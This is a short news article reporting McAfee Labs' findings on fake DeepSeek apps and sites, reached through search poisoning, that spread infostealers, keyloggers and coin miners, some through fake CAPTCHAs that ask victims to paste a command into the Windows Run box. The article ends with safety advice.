- McAfee’s researchers find a “cocktail” of malware hiding behind fake DeepSeek apps
- The campaign preys on people searching for the generative AI tool
- Infostealers, crypto miners, and more, are being deployed this way
The hype around DeepSeek is the next big thing cybercriminals are exploiting in their hacking campaigns, researchers from McAfee Labs are saying.
The team has outlined how they saw cybercriminals setting up various websites, offering different versions of DeepSeek for download. Victims would reach these websites through search engines, meaning that some SEO poisoning was involved in the campaign, as well.
When they reach the websites and download the software, the victims are infected with a “cocktail of malware”, ranging from keyloggers and password stealers, to coin miners. These malware variants can steal sensitive information (including banking credentials and cryptocurrency wallet information), and can force the infected computer to mine cryptocurrency, rendering it useless for pretty much anything else.
You may like
Fake CAPTCHA
While on some websites, the victims are invited to download a DeepSeek app or program, on others – the devil is in the CAPTCHA.
In some cases observed by McAfee, victims would visit a website with a CAPTCHA that can be “solved” by copying and pasting a command into the Run program on Windows. This command just downloads and runs a malware dropper.
To stay safe, you should stay vigilant at all times. Instead of “googling” for something, visit the website directly, and if you don’t know the address, scrutinize every link returned by the search engine.
Furthermore, a real CAPTCHA will never ask you to paste a command into the Run program.
Hackers are known for tapping into current trends to distribute malware. Similar campaigns were observed when Chat-GPT was first released, both for Windows and Android.
Major events, such as Black Friday and Cyber Monday, the Olympic Games, World Cup, and others, have all been abused in the past. The Covid-19 breakout, Russo-Ukrainian war, and the US presidential elections, all served as platforms for information theft, malware distribution, and wire fraud.
You might also like
Services Marketplace – Listings, Bookings & Reviews